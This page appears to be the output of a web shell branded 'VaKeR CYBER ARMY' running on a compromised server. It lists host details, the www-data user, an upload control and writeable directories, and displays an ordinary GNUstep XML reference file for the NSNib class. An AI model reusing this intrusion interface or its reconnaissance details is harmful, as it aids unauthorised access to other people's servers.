VaKeR CYBER ARMY
Logo of a company Server : Apache/2.4.41 (Ubuntu)
System : Linux absol.cf 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Directory :  /proc/self/root/usr/share/GNUstep/Documentation/Developer/Gui/Reference/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/self/root/usr/share/GNUstep/Documentation/Developer/Gui/Reference/NSNib.gsdoc
<?xml version="1.0"?>
<!DOCTYPE gsdoc PUBLIC "-//GNUstep//DTD gsdoc 1.0.4//EN" "http://www.gnustep.org/gsdoc-1_0_4.dtd">
<gsdoc base="NSNib" up="Gui">
  <head>
    <title>NSNib</title>
    <author name="Gregory John Casamento">
      <email address="greg_casamento@yahoo.com">
        greg_casamento@yahoo.com
      </email>
    </author>
    <abstract>
      This class serves as a container for a nib file. It's
      possible to load a nib file from a URL or from a bundle.
      Using this class the nib file can now be "preloaded" and
      instantiated multiple times when/if needed. Also,
      since it's possible to initialize this class using a NSURL
      it's possible to load nib files from remote locations.
      <br /> This class uses: NSNibOwner and
      NSNibTopLevelObjects to allow the caller to
      specify the owner of the nib during instantiation and
      receive an array containing the top level objects of the
      nib file.
    </abstract>
    <copy>2004 Free Software Foundation, Inc.</copy>
  </head>
  <body>
    <front><contents /></front>
    <chapter>
      <heading>
        Software documentation for the NSNib class
      </heading>
      <class name="NSNib" super="NSObject" ovadd="1.0.0">
        <declared>AppKit/NSNib.h</declared>
        <conform>NSCoding</conform>
        <desc>
          <em>Description forthcoming.</em>
        </desc>
        <ivariable type="NSBundle*" name="_bundle" validity="protected" ovadd="1.0.0">
          <desc>
            <em>Warning</em> the underscore at the start of the
            name of this instance variable indicates that, even
            though it is not technically <em>private</em>, it is
            intended for internal use within the package, and
            you should not use the variable in other code.
          </desc>
        </ivariable>
        <ivariable type="id" name="_loader" validity="protected" ovadd="1.0.0">
          <desc>
            <em>Warning</em> the underscore at the start of the
            name of this instance variable indicates that, even
            though it is not technically <em>private</em>, it is
            intended for internal use within the package, and
            you should not use the variable in other code.
          </desc>
        </ivariable>
        <ivariable type="NSData*" name="_nibData" validity="protected" ovadd="1.0.0">
          <desc>
            <em>Warning</em> the underscore at the start of the
            name of this instance variable indicates that, even
            though it is not technically <em>private</em>, it is
            intended for internal use within the package, and
            you should not use the variable in other code.
          </desc>
        </ivariable>
        <ivariable type="NSURL*" name="_url" validity="protected" ovadd="1.0.0">
          <desc>
            <em>Warning</em> the underscore at the start of the
            name of this instance variable indicates that, even
            though it is not technically <em>private</em>, it is
            intended for internal use within the package, and
            you should not use the variable in other code.
          </desc>
        </ivariable>
        <method type="id" ovadd="1.0.0">
          <sel>initWithContentsOfURL:</sel>
          <arg type="NSURL*">nibFileURL</arg>
          <desc>
            Load the NSNib object from the specified URL. This
            location can be any type of resource capable of
            being pointed to by the NSURL object. A file in the
            local file system or a file on an ftp site.
          </desc>
        </method>
        <method type="id" ovadd="1.0.0">
          <sel>initWithNibNamed:</sel>
          <arg type="NSString*">nibNamed</arg>
          <sel>bundle:</sel>
          <arg type="NSBundle*">bundle</arg>
          <desc>
            Load the nib indicated by
            <code><var>nibNamed</var></code>. If the
            <code><var>bundle</var></code> argument is
            <code>nil</code>, then the main <var>bundle</var> is
            used to resolve the path, otherwise the
            <var>bundle</var> which is supplied will be used.
          </desc>
        </method>
        <method type="BOOL" ovadd="1.0.0">
          <sel>instantiateNibWithExternalNameTable:</sel>
          <arg type="NSDictionary*">externalNameTable</arg>
          <desc>
            This method instantiates the nib file. The
            <var>externalNameTable</var> dictionary accepts the
            NSNibOwner and NSNibTopLevelObjects entries
            described earlier. It is recommended, for
            subclasses whose purpose is to change the
            behaviour of nib loading, to override this
            method.
          </desc>
        </method>
        <method type="BOOL" ovadd="0.0.0" ovrem="0.0.0">
          <sel>instantiateNibWithExternalNameTable:</sel>
          <arg type="NSDictionary*">externalNameTable</arg>
          <sel>withZone:</sel>
          <arg type="NSZone*">zone</arg>
          <desc>
            This is a GNUstep specific method. This method is used
            when the caller wants the objects instantiated in the
            nib to be stored in the given
            <code><var>zone</var></code>.
          </desc>
        </method>
        <method type="BOOL" ovadd="1.0.0">
          <sel>instantiateNibWithOwner:</sel>
          <arg type="id">owner</arg>
          <sel>topLevelObjects:</sel>
          <arg type="NSArray**">topLevelObjects</arg>
          <desc>
            This method instantiates the nib file. It utilizes the
            instantiateNibWithExternalNameTable:
            method to, in a convenient way, allow the user to
            specify both keys accepted by the nib loading
            process.
          </desc>
        </method>
      </class>
    </chapter>
  </body>
</gsdoc>

VaKeR 2022